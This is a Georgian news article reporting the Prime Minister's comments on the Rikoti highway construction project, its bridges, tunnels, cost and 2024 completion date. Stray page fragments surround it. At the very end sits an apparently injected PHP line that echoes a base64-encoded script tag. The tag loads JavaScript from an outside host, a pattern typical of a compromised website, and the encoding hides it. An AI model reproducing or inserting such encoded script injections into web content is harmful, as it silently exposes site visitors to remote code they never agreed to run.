celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა, რიკოთის უღელტეხილზე ავტომაგისტრალის უბისა-შორაპანის მონაკვეთის სამშენებლო სამუშაოების გაცნობისას განაცხადა, რომ ეს „საუკუნის პროექტია“ და ის ევროპის მასშტაბით გამორჩეულია.
 
მისი თქმით, რიკოთის ავტომაგისტრალის პროექტის ღირებულება 2 მლრდ ლარზე მეტი ღირებულებისაა და 2024 წელს დასრულდება.
 
„რიკოთის მონაკვეთზე შენდება 96 ხიდი და 53 გვირაბი. ეს მართლაც საუკუნის პროექტია. ასეთი მასშტაბის და ამ სირთულის პროექტები ქვეყანაში არ განხორციელებულა; მეტიც, ეს ევროპის მასშტაბით გამორჩეული პროექტია, ჯდება 2 მილიარდ ლარზე მეტი და პროექტი სრულად 2024 წელს დასრულდება “, - განაცხადა პრემიერმა.
 
ჟურნალისტებთან საუბრისას მთავრობის მეთაურმა აღნიშნა, რომ პროექტის განხორციელების შედეგად მოქალაქეები თბილისიდან ბათუმში 3 სააათში ჩავლენ.
 
„მინდა აღვნიშნო, რომ ჩვენ ვაგრძელებთ მასშტაბურ სამუშაოებს ყველა მიმართულებით. ყველა რეგიონის მიმართულებით ვიწყებთ ახალი მაგისტრალების მშენებლობას, იქნება ეს კახეთის მაგისტრალი, სამხრეთის მონაკვეთის დასრულება თუ ა.შ. ეს მონაკვეთი მნიშვნელოვანია იმ კუთხითაც, რომ აღმოსავლეთ-დასავლეთის მთავარი მაგისტრალის შემადგენელი ნაწილია, რომელიც ბრესტიდან იწყება და ჩინეთის საზღვრამდე მთავრდება. სწორედ ჩვენი მონაკვეთია უმნიშვნელოვანესი, ეს არის 388-კმ-იანი მონაკვეთი. რა თქმა უნდა, მოხარული ვართ, რომ აქ დასაქმებული მოქალაქეების 70% ქართველია. ისინი ძალიან დიდ გამოცდილებას იღებენ“, - განაცხადა ირაკლი ღარიბაშვილმა.
1119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");